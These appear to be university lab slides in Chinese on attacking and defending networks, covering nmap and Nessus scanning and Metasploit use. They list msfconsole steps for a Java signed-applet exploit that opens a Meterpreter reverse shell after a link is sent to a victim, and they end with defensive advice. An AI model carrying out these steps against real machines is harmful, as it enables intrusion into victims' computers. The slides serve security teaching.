360 likes | 526 Views
網路攻防實習. ITLAB Hou -Yi Chou, Chih -Kai Mo, Yu-Ting Lai. 今天的目標. 找出 目標 偵查 弱點 攻擊目標. nmap. 強力掃描工具 安裝 方式 sudo apt-get install nmap 掃描方式請 參考 Module04. Nessus. 弱點掃描器 目前最新版本 5.2.1 (2013/6/6) 載點: http :// www.rapid7.com/products/metasploit/download.jsp 台灣地區已無法從官網免費下載,需透過美國 proxy 代理,或其他管道
E N D
網路攻防實習 ITLAB Hou-Yi Chou, Chih-Kai Mo, Yu-Ting Lai
今天的目標 找出目標 偵查弱點 攻擊目標
nmap • 強力掃描工具 • 安裝方式 • sudo apt-get install nmap • 掃描方式請參考Module04
Nessus 弱點掃描器 目前最新版本5.2.1(2013/6/6) 載點:http://www.rapid7.com/products/metasploit/download.jsp 台灣地區已無法從官網免費下載,需透過美國proxy代理,或其他管道 取得認證碼http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code 這邊還是需要用到proxy,先別急著關…
Nessus • 這邊提供另一個載點 • http://itlab.ee.ncku.edu.tw/download/Nessus-5.2.1-ubuntu910_amd64.deb • 此檔案僅供測試,請於實驗結束後刪除
Nessus 安裝與啟動步驟 • $ dpkg -i Nessus-xxx.deb • $ /etc/init.d/nessusd start • $ firefox • https://localhost:8834
Nessus • 由於nessus資料庫更新需要一段時間,助教這邊提供一台安裝好nessus的主機 • 主機位置:自己找XD • 連接埠:8834 • 帳號:nessus • 密碼:password • 注意:nessus僅供測試用途,請勿對外掃描!
然後呢? So what? 這不是Module05就做過了嗎? = = 老師沒教的是 怎麼利用這些弱點? 好戲上場!
利用弱點攻擊目標 Metasploit 載點:http://www.rapid7.com/products/metasploit/download.jsp 備用載點:http://itlab.ee.ncku.edu.tw/download/metasploit-latest-linux-x64-installer.run 滲透測試用 目前最新版本4.6.2(2013/6/6)
Metasploit • 安裝 • sudochmod 755 metasploit-xxxx.run • sudo ./metasploit-xxxx.run • 進入主控台模式 • sudomsfconsole • 利用剛剛的弱點:MS12-020
msfconsole • 一些基本指令 • help • show //顯示各種資訊 • search //尋找包含關鍵字的漏洞、弱點… • info //顯示某個系統漏洞的相關訊息 • use //使用模組 • set //設定選項
還有更可怕的 DoS攻擊僅僅是阻斷服務(癱瘓主機),對於企業或政府單位來說具有很大傷害 不過對於一般人來說只是 當機! 好像不痛不癢嘛… Windows不意外 讓我們繼續看下去…
攻擊步驟 use exploit/multi/browser/java_signed_applet set payload windows/meterpreter/reverse_tcp show options set SRVHOST x.x.x.x set LHOST x.x.x.x show options exploit 發送網頁連結給受害者
攻擊步驟 • 等候受害者連接… • sessions -l • sessions -i xx • shell • 剩下的請自行發揮想像力 • notepad • calc • …
結論 • 地球是很危險的! • 請時常維護系統 • 更新作業系統 • 開啟防火牆 • 更新防毒軟體病毒碼 • 提高資訊安全意識 • 不要亂點連結 • 小心不明E-mail • 時常關注運行程序與開啟的埠口 • 保持警覺!
附錄 • 工具清單 • ping • traceroute • nc (net cat) • nmap • nessus • metasploit